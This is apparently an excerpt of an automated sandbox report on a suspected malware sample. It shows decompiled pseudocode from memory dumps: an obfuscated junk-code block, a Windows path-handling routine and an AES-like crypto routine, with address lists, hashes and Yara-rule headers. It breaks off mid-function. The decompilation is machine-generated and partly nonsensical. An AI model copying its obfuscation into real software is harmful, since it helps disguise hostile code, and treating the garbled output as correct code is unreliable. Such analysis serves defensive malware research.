																					 *0x77b665a2 =  *0x77b665a2 >> 0;
																					__dl = __dl +  *0xe258b7e7;
																					asm("ror dword [0x92bb968], 0xdf");
																					asm("scasd");
																					asm("adc esi, 0x64180ea9");
																					_t47 = __dh;
																					__dh =  *0x207d37ca;
																					 *0x207d37ca = _t47;
																					 *0xdd28bbf6 =  *0xdd28bbf6 & __ch;
																					__ebx = __ebx -  *0x302e4f3d;
																					 *0xd5fe312 =  *0xd5fe312 | __dl;
																					__eflags = __esi & 0x4a6ebf1b;
																					 *0xdd8f84b6 =  *0xdd8f84b6 >> 0x43;
																					__esp = 0x5eacd395;
																					L1();
																					asm("sbb ebp, [0xc4ee0e8]");
																					__eflags =  *0xf5aff065 & 0xc5bfcceb;
																					asm("lodsd");
																					asm("sbb [0x9342e1bd], esp");
																					 *0xe3e2615 =  *0xe3e2615 - __esi;
																					__eax = __eax - 1;
																					asm("adc [0x87cdb6da], edx");
																					__dl = __dl &  *0x82a50018;
																					__eax =  *0x3989de69 * 0x1230;
																					__esp = 0xb36b83fa;
																					 *0x85d0beb8 =  *0x85d0beb8 ^ __esi;
																					 *0x93edc41b =  *0x93edc41b << 0x15;
																					__edx = __edx + 0xe85eacd3;
																					__ah = __ah & 0x000000e0;
																					__esi = __esi - 1;
																					 *0x526db51e =  *0x526db51e ^ __ebp;
																					__ebx = __ebx & 0xc6330765;
																					asm("rol dword [0xdfec8c7], 0xff");
																					__eflags =  *0xc7993a25 & __ebp;
																					__eax = 1 +  *0x3989de69 * 0x1230;
																					__eflags = __eax;
																					asm("adc ecx, [0x50c4e696]");
																					return __eax;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t98 = _t98 | 0xb91a0d09;
				 *0x72e9c312 =  *0x72e9c312 + _t85;
				asm("adc [0x1db93386], bl");
				_push( *0x311fc781);
				_t59 = _t59 -  *0xbc0d211e | 0x000000f6;
				if(_t59 < 0) {
					 *0xcb4e779 = _t59;
					 *0xa64daee1 =  *0xa64daee1 & _t76;
					asm("adc ecx, 0x21a46e15");
					if( *0xa64daee1 != 0) {
						 *0x3efc5374 = _t85;
						asm("adc bl, [0xea4f3308]");
						asm("rol dword [0x205aea3e], 0xa9");
						 *0xd2f0eb3 =  *0xd2f0eb3 >> 0x7f;
						asm("rcl byte [0xbba3c718], 0x69");
						 *0xb5903b28 =  *0xb5903b28 << 0xf8;
						asm("ror byte [0x628b13b4], 0x18");
						_t93 = _t93 -  *0x3886252b;
						_t85 =  *0x3efc5374 ^  *0xbaa9d86;
						 *0x412110e7 = _t59;
						 *0x4dde55f0 =  *0x4dde55f0 >> 0x71;
						asm("sbb [0xc9edcc6d], ecx");
						_t89 = _t89 - 1;
						_t59 = _t59 + 1;
						 *0x62d4c50a =  *0x62d4c50a >> 0xf0;
					}
				}
				goto L1;
			}

0x0041b5d3
0x0041b5d8
0x0041b5e6
0x0041b5e8
0x0041b5f9
0x0041b5ff
0x0041b60c
0x0041b620
0x0041b621
0x0041b632
0x0041b639
0x0041b63a
0x0041b64a
0x0041b651
0x0041b65f
0x0041b665
0x0041b66b
0x0041b66c
0x0041b66d
0x0041b674
0x0041b676
0x0041b679
0x0041b67f
0x0041b681
0x0041b688
0x0041b6a3
0x0041b6b0
0x0041b6c0
0x0041b6d3
0x0041b6d4
0x0041b6da
0x0041b6e1
0x0041b6e8
0x0041b6f2
0x0041b6f9
0x0041b6ff
0x0041b70b
0x0041b71a
0x0041b720
0x0041b721
0x0041b727
0x0041b72e
0x0041b733
0x0041b73a
0x0041b741
0x0041b74d
0x0041b752
0x0041b759
0x0041b765
0x0041b76a
0x0041b770
0x0041b771
0x0041b772
0x0041b778
0x0041b77e
0x0041b784
0x0041b789
0x0041b78f
0x0041b795
0x0041b79b
0x0041b79d
0x0041b79e
0x0041b7a4
0x0041b7ab
0x0041b7b1
0x0041b7b2
0x0041b7b8
0x0041b7be
0x0041b7c4
0x0041b7ca
0x0041b7cd
0x0041b7d3
0x0041b7d9
0x0041b7d9
0x0041b7e0
0x0041b7e6
0x0041b7e8
0x0041b7ee
0x0041b7f8
0x0041b7fe
0x0041b804
0x0041b80a
0x0041b80b
0x0041b811
0x0041b814
0x0041b817
0x0041b81d
0x0041b823
0x0041b82a
0x0041b830
0x0041b831
0x0041b837
0x0041b83d
0x0041b843
0x0041b849
0x0041b84a
0x0041b850
0x0041b856
0x0041b857
0x0041b85d
0x0041b85e
0x0041b85e
0x0041b85f
0x0041b85f
0x0041b85f
0x0041b865
0x0041b86b
0x0041b871
0x0041b877
0x0041b878
0x0041b87f
0x0041b885
0x0041b886
0x0041b88c
0x0041b88d
0x0041b893
0x0041b89d
0x0041b8a3
0x0041b8a4
0x0041b8aa
0x0041b8ab
0x0041b8b1
0x0041b8b7
0x0041b8bd
0x0041b8bf
0x0041b8c5
0x0041b8cb
0x0041b8d2
0x0041b8d8
0x0041b8de
0x0041b8e5
0x0041b8e6
0x0041b8ec
0x0041b8f2
0x0041b8f8
0x0041b8fe
0x0041b903
0x0041b904
0x0041b90b
0x0041b911
0x0041b912
0x0041b918
0x0041b91e
0x0041b91e
0x0041b91e
0x0041b924
0x0041b92a
0x0041b930
0x0041b936
0x0041b93c
0x0041b942
0x0041b94e
0x0041b954
0x0041b95a
0x0041b960
0x0041b967
0x0041b968
0x0041b96f
0x0041b975
0x0041b976
0x0041b983
0x0041b989
0x0041b98b
0x0041b991
0x0041b997
0x0041b99d
0x0041b99f
0x0041b9a5
0x0041b9ac
0x0041b9b2
0x0041b9b5
0x0041b9b5
0x0041b9bb
0x0041b9c1
0x0041b9c2
0x0041b9c8
0x0041b9ce
0x0041b9ce
0x0041b9d8
0x0041b9de
0x0041b9e4
0x0041b9ea
0x0041b9f0
0x0041b9f5
0x0041b9fb
0x0041b9fc
0x0041ba03
0x0041ba09
0x0041ba09
0x0041ba0f
0x0041ba15
0x0041ba1b
0x0041ba20
0x0041ba26
0x0041ba2c
0x0041ba32
0x0041ba38
0x0041ba3e
0x0041ba44
0x0041ba4a
0x0041ba51
0x0041ba57
0x0041ba5e
0x0041ba5e
0x0041ba64
0x0041ba6a
0x0041ba6f
0x0041ba74
0x0041ba7a
0x0041ba80
0x0041ba85
0x0041ba85
0x0041ba8b
0x0041ba91
0x0041ba97
0x0041ba9d
0x0041baa3
0x0041baa6
0x0041baac
0x0041baae
0x0041bab5
0x0041bab5
0x0041bab5
0x0041babb
0x0041bac1
0x0041bac7
0x0041bacc
0x0041bacd
0x0041bad3
0x0041bad9
0x0041badf
0x0041bae5
0x0041baeb
0x0041baf1
0x0041baf7
0x0041bafd
0x0041bb03
0x0041bb09
0x0041bb0f
0x0041bb15
0x0041bb1b
0x0041bb1b
0x0041bb1b
0x0041bb21
0x0041bb27
0x0041bb2d
0x0041bb2e
0x0041bb34
0x0041bb3a
0x0041bb40
0x0041bb46
0x0041bb46
0x0041bb4e
0x0041bb50
0x0041bb51
0x0041bb57
0x0041bb5d
0x0041bb5d
0x0041bb67
0x0041bb6d
0x0041bb73
0x0041bb7a
0x0041bb7b
0x0041bb7d
0x0041bb83
0x0041bb89
0x0041bb8f
0x0041bb95
0x0041bb9b
0x0041bba1
0x0041bba6
0x0041bba7
0x0041bbad
0x0041bbb3
0x0041bbb3
0x0041bbb9
0x0041bbbf
0x0041bbc5
0x0041bbcb
0x0041bbd1
0x0041bbd8
0x0041bbdf
0x0041bbe0
0x0041bbe3
0x0041bbe4
0x0041bbe4
0x0041bbea
0x0041bbf0
0x0041bbf6
0x0041bbfd
0x0041bbfd
0x0041bbfe
0x0041bc04
0x0041bc04
0x0041bc04
0x0041bc0a
0x0041bc0b
0x0041bc12
0x0041bc18
0x0041bc1f
0x0041bc25
0x0041bc2b
0x0041bc35
0x0041bc3c
0x0041bc42
0x0041bc48
0x0041bc4b
0x0041bc4c
0x0041bc53
0x0041bc59
0x0041bc5a
0x0041bc61
0x0041bc62
0x0041bc68
0x0041bc6e
0x0041bc73
0x0041bc79
0x0041bc7f
0x0041bc85
0x0041bc8c
0x0041bc8d
0x0041bc8e
0x0041bc94
0x0041bc9b
0x0041bca1
0x0041bca1
0x0041bca1
0x0041bca7
0x0041bcad
0x0041bcb3
0x0041bcba
0x0041bcc0
0x0041bcc0
0x0041bcc6
0x0041bccc
0x0041bcd6
0x0041bcdc
0x0041bce3
0x0041bce3
0x0041bce3
0x0041bce9
0x0041bcef
0x0041bcf0
0x0041bcf7
0x0041bcfe
0x0041bd04
0x0041bd05
0x0041bd0b
0x0041bd15
0x0041bd22
0x0041bd28
0x0041bd2e
0x0041bd34
0x0041bd3b
0x0041bd41
0x0041bd47
0x0041bd51
0x0041bd57
0x0041bd5d
0x0041bd5e
0x0041bd64
0x0041bd64
0x0041bd6a
0x0041bd6b
0x00000000
0x0041bd71
0x0041bd71
0x0041bd77
0x0041bd7d
0x0041bd83
0x0041bd89
0x0041bd90
0x0041bd97
0x0041bd98
0x0041bd9e
0x0041bda4
0x0041bdaa
0x0041bdb1
0x0041bdb7
0x0041bdbe
0x0041bdbf
0x0041bdc5
0x0041bdc5
0x0041bdc5
0x0041bdcb
0x0041bdd1
0x0041bdd7
0x0041bddd
0x0041bde3
0x0041bdea
0x0041bdef
0x0041bdf4
0x0041bdfa
0x0041be00
0x0041be01
0x0041be07
0x0041be0d
0x0041be0e
0x0041be14
0x0041be1a
0x0041be24
0x0041be29
0x0041be2f
0x0041be36
0x0041be3c
0x0041be3f
0x0041be40
0x0041be46
0x0041be4c
0x0041be53
0x0041be59
0x0041be59
0x0041be5a
0x0041be60
0x0041be60
0x0041bd6b
0x0041bcc6
0x0041bbfe
0x0041bbf0
0x0041bbc5
0x0041bbb9
0x0041bb67
0x0041bb57
0x0041ba8b
0x0041ba64
0x0041ba15
0x0041b9de
0x0041b9c8
0x0041b88d
0x0041b865
0x0041b7e8
0x0041b4a6
0x0041b4a6
0x0041b4ac
0x0041b4b8
0x0041b4be
0x0041b4c4
0x0041b4c7
0x0041b4c9
0x0041b4ce
0x0041b4d4
0x0041b4da
0x0041b4dc
0x0041b4e2
0x0041b4e8
0x0041b4f5
0x0041b4fc
0x0041b509
0x0041b510
0x0041b51d
0x0041b529
0x0041b52f
0x0041b534
0x0041b53b
0x0041b541
0x0041b542
0x0041b549
0x0041b549
0x0041b4da
0x00000000

Memory Dump Source

Source File: 00000001.00000002.395997570.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71675f9a3a8900a6809729cd5ba12563d39fcf73a463bf81e0e574d8bc98697
Instruction ID: 1bc29dcb3e205ed6a22f76494134948f8e7bd92b2c703de4ac970cebab697fa1
Opcode Fuzzy Hash: f71675f9a3a8900a6809729cd5ba12563d39fcf73a463bf81e0e574d8bc98697
Instruction Fuzzy Hash: B3228672808781CFD706CF38D9CAB523FB5F786324B08425ED5A297592D738266ACF85

Uniqueness

Uniqueness Score: -1.00%

Function 01A04120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E01A04120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x1add360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E01A1F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E01A06E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L01A04620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E01A06E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M01A045F8))) {
												case 0:
													_v568 = 0x19c1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x19c11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L01A04620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E01A2F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E01A2F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E019E52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E019FEB70(1, 0x1ad79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E019FAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E01A295D0();
																			L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L01A077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E01A2B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E01A23D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E01A2B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x01a04128
0x01a04135
0x01a0413c
0x01a04141
0x01a04145
0x01a04147
0x01a0414e
0x01a04151
0x01a04159
0x01a0415c
0x01a04160
0x01a04164
0x01a04168
0x01a0416c
0x01a0417f
0x01a04181
0x01a0446a
0x01a0446a
0x01a0418c
0x01a04195
0x01a04199
0x01a04432
0x01a04439
0x01a0443d
0x01a04442
0x01a04447
0x00000000
0x01a0419f
0x01a041a3
0x01a041b1
0x01a041b9
0x01a041bd
0x01a045db
0x01a045db
0x00000000
0x01a041c3
0x01a041c3
0x01a041ce
0x01a041d4
0x01a4e138
0x01a4e13e
0x01a4e169
0x01a4e16d
0x01a4e19e
0x01a4e16f
0x01a4e16f
0x01a4e175
0x01a4e179
0x01a4e18f
0x01a4e193
0x00000000
0x01a4e199
0x00000000
0x01a4e199
0x01a4e193
0x00000000
0x00000000
0x00000000
0x01a041da
0x01a041da
0x01a041df
0x01a041e4
0x01a041ec
0x01a04203
0x01a04207
0x01a4e1fd
0x01a04222
0x01a04226
0x01a4e1f3
0x01a4e1f3
0x01a0422c
0x01a0422c
0x01a04233
0x01a4e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01a04239
0x01a04239
0x01a04239
0x01a04239
0x01a04233
0x01a04226
0x01a041ee
0x01a041ee
0x01a041f4
0x01a04575
0x01a4e1b1
0x01a4e1b1
0x00000000
0x01a0457b
0x01a0457b
0x01a04582
0x01a4e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x01a04588
0x01a04588
0x01a0458c
0x01a4e1c4
0x01a4e1c4
0x00000000
0x01a04592
0x01a04592
0x01a04599
0x01a4e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x01a0459f
0x01a0459f
0x01a045a3
0x01a4e1d7
0x01a4e1e4
0x00000000
0x01a045a9
0x01a045a9
0x01a045b0
0x01a4e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x01a045b6
0x01a045b6
0x01a045b6
0x00000000
0x01a045b6
0x01a045b0
0x01a045a3
0x01a04599
0x01a0458c
0x01a04582
0x00000000
0x00000000
0x00000000
0x00000000
0x01a041f4
0x01a0423e
0x01a04241
0x01a045c0
0x01a045c4
0x00000000
0x01a045ca
0x01a045ca
0x00000000
0x01a4e207
0x01a4e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x01a045d1
0x00000000
0x00000000
0x01a045ca
0x00000000
0x01a04247
0x01a04247
0x01a04247
0x01a04249
0x01a04249
0x01a04249
0x01a04251
0x01a04251
0x01a04257
0x01a0425f
0x01a0426e
0x01a04270
0x01a0427a
0x01a4e219
0x01a4e219
0x01a04280
0x01a04282
0x01a04456
0x01a045ea
0x00000000
0x01a045f0
0x01a4e223
0x00000000
0x01a4e223
0x01a0445c
0x01a0445c
0x00000000
0x01a0445c
0x00000000
0x01a04288
0x01a0428c
0x01a4e298
0x01a04292
0x01a04292
0x01a0429e
0x01a042a3
0x01a042a7
0x01a042ac
0x01a4e22d
0x01a042b2
0x01a042b2
0x01a042b9
0x01a042bc
0x01a042c2
0x01a042ca
0x01a042cd
0x01a042cd
0x01a042d4
0x01a0433f
0x01a0433f
0x01a042d6
0x01a042d6
0x01a042d9
0x01a042dd
0x01a042eb
0x01a4e23a
0x01a042f1
0x01a04305
0x01a0430d
0x01a04315
0x01a04318
0x01a0431f
0x01a04322
0x01a0432e
0x01a0433b
0x01a0433b
0x00000000
0x01a0432e
0x01a042eb
0x01a0434c
0x01a0434e
0x01a04352
0x01a04359
0x01a0435e
0x01a04361
0x01a0436e
0x01a0438a
0x01a0438e
0x01a04396
0x01a0439e
0x01a043a1
0x01a043ad
0x01a043bb
0x01a043bb
0x01a043ad
0x01a0436e
0x01a043bf
0x01a043c5
0x01a04463
0x01a04463
0x01a043ce
0x01a043d5
0x01a043d9
0x01a043df
0x01a04475
0x01a04479
0x01a04491
0x01a04491
0x01a04479
0x01a043e5
0x01a043eb
0x01a043f4
0x01a043f6
0x01a043f9
0x01a043fc
0x01a043ff
0x01a044e8
0x01a044ed
0x01a044f3
0x01a4e247
0x00000000
0x01a044f9
0x01a04504
0x01a04508
0x01a0450f
0x01a4e269
0x00000000
0x01a04515
0x01a04519
0x01a04531
0x01a04534
0x01a04537
0x01a0453e
0x01a04541
0x01a0454a
0x01a4e255
0x01a4e255
0x01a4e25b
0x01a4e25e
0x01a4e261
0x01a4e261
0x01a04555
0x01a04559
0x01a0455d
0x01a4e26d
0x01a4e270
0x01a4e274
0x01a4e27a
0x01a4e27d
0x01a4e28e
0x01a4e28e
0x01a04563
0x01a04563
0x01a04569
0x01a04569
0x00000000
0x01a0455d
0x01a0450f
0x00000000
0x01a044f3
0x01a043ff
0x01a04405
0x01a04405
0x01a04405
0x01a042ac
0x01a0428c
0x01a04282
0x01a04407
0x01a0440d
0x01a4e2af
0x01a4e2af
0x01a04413
0x01a04413
0x00000000
0x01a041d4
0x00000000
0x01a041c3
0x01a041bd
0x01a04415
0x01a04415
0x01a04416
0x01a04417
0x01a04429
0x01a0416e
0x01a0416e
0x01a04175
0x01a04498
0x01a0449f
0x01a4e12d
0x00000000
0x01a4e133
0x00000000
0x01a4e133
0x01a044a5
0x01a044a5
0x01a044aa
0x00000000
0x01a044bb
0x01a044ca
0x01a044d6
0x01a044d7
0x01a044d8
0x01a044e3
0x01a044e3
0x01a044aa
0x01a0417b
0x01a0417b
0x01a0417b
0x00000000
0x01a0417b
0x01a04175
0x00000000

Memory Dump Source

Source File: 00000001.00000002.396482282.00000000019C0000.00000040.00000001.sdmp, Offset: 019C0000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07ea31c0edfac5702a2f522a7706e26127aa15a5cb16568aebc4feffbf6f38b4
Instruction ID: 208231d9d7d6d5fbda25839474ab4caa7950ec72d1f55699544a52c74352f87e
Opcode Fuzzy Hash: 07ea31c0edfac5702a2f522a7706e26127aa15a5cb16568aebc4feffbf6f38b4
Instruction Fuzzy Hash: 2BF17D706083118FD725CF29D480A7ABBF1BF98714F09492EFA86C7291E735D895CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00402FB0, Relevance: .4, Instructions: 435
COMMONCrypto

Download Yara Rule

C-Code - Quality: 26%

			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t273;
				signed int _t274;
				signed int _t282;
				signed int* _t358;
				signed int _t383;
				signed int* _t409;
				signed int _t429;
				signed int _t458;
				signed int _t478;
				signed int _t560;
				signed int _t603;

				_t273 = __eax;
				asm("ror edi, 0x8");
				asm("rol edx, 0x8");
				_t458 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_v20 = _t458;
				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
				asm("ror ebx, 0x8");
				asm("rol edx, 0x8");
				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
				asm("ror esi, 0x8");
				asm("rol edx, 0x8");
				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
				asm("ror edx, 0x10");
				asm("ror esi, 0x8");
				asm("rol esi, 0x8");
				_v24 = _t282;
				_t429 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t458 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
				asm("ror esi, 0x10");
				asm("ror ebx, 0x8");
				asm("rol ebx, 0x8");
